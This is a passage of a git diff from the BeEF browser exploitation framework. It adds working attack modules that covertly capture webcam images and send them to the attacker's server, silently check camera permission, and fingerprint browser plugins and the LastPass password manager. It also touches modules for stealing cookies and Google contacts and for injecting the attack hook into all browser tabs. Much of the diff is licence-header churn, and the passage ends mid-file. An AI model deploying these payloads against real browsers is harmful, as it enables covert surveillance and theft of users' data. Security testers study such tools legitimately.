language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_firebug < BeEF::Core::Command diff --git a/modules/browser/detect_foxit/command.js b/modules/browser/detect_foxit/command.js new file mode 100644 index 000000000..937e4c2a2 --- /dev/null +++ b/modules/browser/detect_foxit/command.js @@ -0,0 +1,14 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var result = ( beef.browser.hasFoxit() )? "Yes" : "No"; + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result); + +}); + diff --git a/modules/browser/detect_foxit/config.yaml b/modules/browser/detect_foxit/config.yaml new file mode 100644 index 000000000..5455200e1 --- /dev/null +++ b/modules/browser/detect_foxit/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_foxit: + enable: true + category: "Browser" + name: "Detect Foxit Reader" + description: "This module will check if the browser has Foxit Reader Plugin." + authors: ["javuto"] + target: + working: ["All"] diff --git a/modules/browser/detect_foxit/module.rb b/modules/browser/detect_foxit/module.rb new file mode 100644 index 000000000..22fd07577 --- /dev/null +++ b/modules/browser/detect_foxit/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_foxit < BeEF::Core::Command + + def post_execute + content = {} + content['foxit'] = @datastore['foxit'] + save content + end + +end diff --git a/modules/browser/detect_lastpass/command.js b/modules/browser/detect_lastpass/command.js new file mode 100644 index 000000000..9486b9210 --- /dev/null +++ b/modules/browser/detect_lastpass/command.js @@ -0,0 +1,29 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var result = "Not in use or not installed"; + + var lpdiv = document.getElementById('hiddenlpsubmitdiv'); + if (typeof(lpdiv) != 'undefined' && lpdiv != null) { + //We've got the first detection of LP + result = "Detected LastPass through presence of the ' + var swfobject_script = '' //This is the javascript that actually calls the swfobject library to include the swf file - var include_script = ''; + var include_script = ''; //Empty body first $j('body').html(''); diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml index 69f3eb5fb..fac0f3544 100644 --- a/modules/browser/webcam/config.yaml +++ b/modules/browser/webcam/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb index de2df6639..ee1ea45f9 100644 --- a/modules/browser/webcam/module.rb +++ b/modules/browser/webcam/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # require 'base64' class Webcam < BeEF::Core::Command diff --git a/modules/browser/webcam_html5/command.js b/modules/browser/webcam_html5/command.js new file mode 100644 index 000000000..1c5dd24a8 --- /dev/null +++ b/modules/browser/webcam_html5/command.js @@ -0,0 +1,50 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + + + +beef.execute(function() { + var vid_id = beef.dom.generateID(); + var can_id = beef.dom.generateID(); + var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'}); + var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'}); + $j('body').append(vid_el); + $j('body').append(can_el); + + var ctx = can_el.getContext('2d'); + + var localMediaStream = null; + + var cap = function() { + if (localMediaStream) { + ctx.drawImage(vid_el,0,0); + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png')); + } else { + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong'); + } + } + + window.URL = window.URL || window.webkitURL; + navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia; + + navigator.getUserMedia({video:true},function(stream) { + vid_el.src = window.URL.createObjectURL(stream); + localMediaStream = stream; + setTimeout(cap,2000); + + }, function(err) { + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed'); + }); + + + + +}); + + + + + diff --git a/modules/browser/webcam_html5/config.yaml b/modules/browser/webcam_html5/config.yaml new file mode 100644 index 000000000..fd6762121 --- /dev/null +++ b/modules/browser/webcam_html5/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + webcam_html5: + enable: true + category: "Browser" + name: "Webcam HTML5" + description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam." + authors: ["xntrik"] + target: + user_notify: ["C"] + unknown: ["All"] diff --git a/modules/browser/webcam_html5/module.rb b/modules/browser/webcam_html5/module.rb new file mode 100644 index 000000000..78794cc3f --- /dev/null +++ b/modules/browser/webcam_html5/module.rb @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +require 'base64' +class Webcam_html5 < BeEF::Core::Command + + def post_execute + content = {} + content["result"] = @datastore["result"] if not @datastore["result"].nil? + content["image"] = @datastore["image"] if not @datastore["image"].nil? + save content + end + +end diff --git a/modules/browser/webcam_permission_check/cameraCheck.as b/modules/browser/webcam_permission_check/cameraCheck.as new file mode 100644 index 000000000..c4fcc40d4 --- /dev/null +++ b/modules/browser/webcam_permission_check/cameraCheck.as @@ -0,0 +1,54 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Source ActionScript for cameraCheck.swf +package { + + import flash.display.Sprite; + import flash.external.ExternalInterface; + import flash.media.Camera; + import flash.system.Security; + import flash.system.SecurityPanel; + + public class CamCheck extends Sprite { + + var _cam:Camera; + + public function CamCheck() { + + if (Camera.isSupported) { + this._cam = Camera.getCamera(); + + if (!this._cam) { + + //Either the camera is not available or some other error has occured + ExternalInterface.call("naPermissions"); + + } else if (this._cam.muted) { + + //The user has not allowed access to the camera + ExternalInterface.call("noPermissions"); + + // Uncomment this show the privacy/security settings window + //Security.showSettings(SecurityPanel.PRIVACY); + } else { + + //The user has allowed access to the camera + ExternalInterface.call("yesPermissions"); + } + + } else { + + //Camera Not Supported + ExternalInterface.call("naPermissions"); + + } + + } + + } + +} \ No newline at end of file diff --git a/modules/browser/webcam_permission_check/cameraCheck.swf b/modules/browser/webcam_permission_check/cameraCheck.swf new file mode 100644 index 000000000..7894dd240 Binary files /dev/null and b/modules/browser/webcam_permission_check/cameraCheck.swf differ diff --git a/modules/browser/webcam_permission_check/command.js b/modules/browser/webcam_permission_check/command.js new file mode 100644 index 000000000..af4ee2610 --- /dev/null +++ b/modules/browser/webcam_permission_check/command.js @@ -0,0 +1,79 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + + +beef.execute(function() { + + + //These 3 functions [naPermissions() The camera is not available or not supported + // yesPermissions() The user is allowing access to the camera / mic + // yesPermissions() The user has not allowed access to the camera / mic + // Flash will invoke these functions directly. + //var js_functions = ''; + + //These functions are global so they can accessed by the cameraCheck.swf file + + noPermissions = function() { + beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :("); + } + + yesPermissions = function() { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D"); + } + + naPermissions = function() { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true"); + } + + //After the swfobject loads the SWF file, this callback sends a status back to BeEF + + var swfobjectCallback = function(e) { + if(e.success){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page"); + } else { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed."); + } + } + + + //This is the DIV for the flash object + + var body_flash_container = '
'; + $j('body').append(body_flash_container); + + // Lets execute swfobject.js + // If it works, we then run it to embed the swf file into the above div + $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) { + var flashvars = {}; + var parameters = {}; + parameters.scale = "noscale"; + parameters.wmode = "opaque"; + parameters.allowFullScreen = "true"; + parameters.allowScriptAccess = "always"; + var attributes = {}; + swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback); + }); + + //A library that helps include the swf file + //var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + //var include_script = ''; + + + //Add flash content + //$j('body').append(js_functions, swfobject_script, body_flash_container, include_script); + +}); + + + + + diff --git a/modules/browser/webcam_permission_check/config.yaml b/modules/browser/webcam_permission_check/config.yaml new file mode 100644 index 000000000..c63080343 --- /dev/null +++ b/modules/browser/webcam_permission_check/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + webcam_permission_check: + enable: true + category: "Browser" + name: "Webcam Permission Check" + description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)" + authors: ["@bw_z"] + target: + working: ["All"] diff --git a/modules/browser/webcam_permission_check/module.rb b/modules/browser/webcam_permission_check/module.rb new file mode 100644 index 000000000..27a3899cf --- /dev/null +++ b/modules/browser/webcam_permission_check/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +class Webcam_permission_check < BeEF::Core::Command + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js') + end + + def post_execute + + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') + end + +end diff --git a/modules/browser/webcam_permission_check/swfobject.js b/modules/browser/webcam_permission_check/swfobject.js new file mode 100644 index 000000000..8eafe9dd8 --- /dev/null +++ b/modules/browser/webcam_permission_check/swfobject.js @@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab"}, function(tab){ diff --git a/modules/chrome_extensions/execute_tabs/config.yaml b/modules/chrome_extensions/execute_tabs/config.yaml index ae9c3031e..b180bb289 100644 --- a/modules/chrome_extensions/execute_tabs/config.yaml +++ b/modules/chrome_extensions/execute_tabs/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/execute_tabs/module.rb b/modules/chrome_extensions/execute_tabs/module.rb index cf476cc61..737456752 100644 --- a/modules/chrome_extensions/execute_tabs/module.rb +++ b/modules/chrome_extensions/execute_tabs/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Execute_tabs < BeEF::Core::Command diff --git a/modules/chrome_extensions/get_all_cookies/command.js b/modules/chrome_extensions/get_all_cookies/command.js index 4a531214b..97c3cd5e2 100755 --- a/modules/chrome_extensions/get_all_cookies/command.js +++ b/modules/chrome_extensions/get_all_cookies/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { the_url = "<%== @url %>"; if (the_url != 'default_all') { diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml index 04cc73ebd..4d93f955d 100755 --- a/modules/chrome_extensions/get_all_cookies/config.yaml +++ b/modules/chrome_extensions/get_all_cookies/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb index 362e62d4f..174048768 100755 --- a/modules/chrome_extensions/get_all_cookies/module.rb +++ b/modules/chrome_extensions/get_all_cookies/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_all_cookies < BeEF::Core::Command diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js index 0f75afdeb..6fa297bce 100644 --- a/modules/chrome_extensions/grab_google_contacts/command.js +++ b/modules/chrome_extensions/grab_google_contacts/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var regContacts = '("AuthToken":{"Value":")(.*)("}}};)'; function grabCSV(token){ diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml index 2046f12b6..52db56f97 100644 --- a/modules/chrome_extensions/grab_google_contacts/config.yaml +++ b/modules/chrome_extensions/grab_google_contacts/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb index 01b9f8c0a..7c8c8bb87 100644 --- a/modules/chrome_extensions/grab_google_contacts/module.rb +++ b/modules/chrome_extensions/grab_google_contacts/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Grab_google_contacts < BeEF::Core::Command diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js index 0e1a6ec14..01d0117ef 100755 --- a/modules/chrome_extensions/inject_beef/command.js +++ b/modules/chrome_extensions/inject_beef/command.js @@ -1,21 +1,12 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook; + var beefHookUri = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook; chrome.windows.getAll({"populate" : true}, function(windows) { for(i in windows) { diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml index 6df5193fb..8455bba15 100755 --- a/modules/chrome_extensions/inject_beef/config.yaml +++ b/modules/chrome_extensions/inject_beef/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb index ebb133088..a11aa10c8 100755 --- a/modules/chrome_extensions/inject_beef/module.rb +++ b/modules/chrome_extensions/inject_beef/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inject_beef < BeEF::Core::Command diff --git a/modules/chrome_extensions/screenshot/command.js b/modules/chrome_extensions/screenshot/command.js index 16fcb3b17..490609056 100755 --- a/modules/chrome_extensions/screenshot/command.js +++ b/modules/chrome_extensions/screenshot/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { chrome.tabs.captureVisibleTab(null, function(img) { diff --git a/modules/chrome_extensions/screenshot/config.yaml b/modules/chrome_extensions/screenshot/config.yaml index 